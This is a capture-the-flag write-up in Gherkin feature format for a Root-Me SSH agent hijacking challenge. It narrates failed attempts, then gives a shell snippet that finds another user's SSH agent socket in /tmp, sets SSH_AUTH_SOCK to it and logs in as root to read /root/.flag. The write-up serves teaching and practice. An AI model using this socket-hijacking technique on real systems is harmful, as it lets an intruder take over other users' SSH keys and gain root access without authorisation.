## Version 2.0
## language: en

Feature: sshagenthijacking-appscripting-rootme
  Code:
    sshagenthijacking
  Site:
    root-me
  Category:
    app scripting
  User:
    danmur
  Goal:
    Get the root protected flag file

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Opera           | 60.0.3255.170 |
    | Windows OS      | 10            |
    | OpenSSH         | 8.0p1         |

  Machine information:
    Given I am accessing through OpenSSH
    And with command 'ssh admin@ctf08.root-me.org'
    And password: admin
    And that the flag is on /root/.flag
    And is running on Debian GNU/Linux 4.9.110-1
    And uses OpenSSH_7.4p1

  Scenario: Fail:init-testing
    Given access to the machine
    Then a message is shown every minute
    """
    Broadcast message from admin@root-me (somewhere)(Fri Jul 19 13:17:00 2019)
    Good Luck !
    """
    When using some commands
    """
    $ pwd
    $ ls -l /
    $ ls -l .ssh/
    """
    Then my current user home is "/home/admin"
    Then password and root folder are protected
    But .ssh/ has a file owned by me
    """
    -rw------- 1 admin admin 394 Sep 24  2018 authorized_keys
    """

  Scenario: Fail:adding-authorized-key
    Given that I can edit 'authorized_keys'
    When I generate my public key
    And add it to the file
    Then login as root failed
    """
    Permission denied, please try again.
    """
    Then I notice that 'authorized_keys' has a final comment
    """
    root@root-me
    """
    Then it suggest that it isn't the file that root agent uses
    And probably the correct one is located inside root directory

  Scenario: Fail:inspecting
    When inspecting connections with 'ss' command
    Then I notice my connection to my local computer (201.184.47.244)
    """
    tcp    ESTAB   0   4936  10.66.8.100:ssh  201.184.47.244:52110
    """
    But if I inspect just after message appeared
    Then I notice a new connection
    """
    tcp    ESTAB   0      0   192.168.10.20:ssh   192.168.10.21:35218
    """
    When I inspect process
    Then I notice this ssh server process
    """
    460 ?        00:00:00 sshd
    4399 ?        00:00:00 sshd
    """
    And just after message appeared a new sshd appear
    """
    5537 ?        00:00:00 sshd
    """

  Scenario: Success:hijacking-agent
    When inspecting connections again
    But with 'ss -l' command
    Then I notice
    """
    u_str  LISTEN     0      128     /tmp/ssh-zpLqN1QW2E/agent.6701 30757
    """
    And because /tmp is readable
    When I see /tmp on message event
    Then I see
    """
    drwx------ 2 admin admin  4096 Jul 19 15:04 ssh-dQghELAnun
    """
    Then I can use this agent socket
    And hijack root agent
    When I try this payload
    """
    tmp="/tmp"
    for folder in $tmp/*/ ; do
        echo "ssh $folder"
        for agent in $folder* ; do
            echo "agent $agent"
        done
    done
    export SSH_AUTH_SOCK=$agent
    ssh-add -l
    ssh root@192.168.10.20 cat /root/.flag
    """
    Then I get
    """
    The authenticity of host '192.168.10.20 (192.168.10.20)' can't
      be established.
    ECDSA key fingerprint is SHA256:mjJZf0BtPVRBFC4YmzYxj0Hp30cjnbIDMOS0pF
      /7Ur4.
    Are you sure you want to continue connecting (yes/no)? yes

    Warning: Permanently added '192.168.10.20' (ECDSA) to the list of known
     hosts.
    root@192.168.10.20's password:
      Permission denied, please try again.
    """
    When trying again the payload
    Then I capture the flag!
    """
    B3_C4rR3fuLl_W1tH_SSH_F0RwArd_AGENT
    """
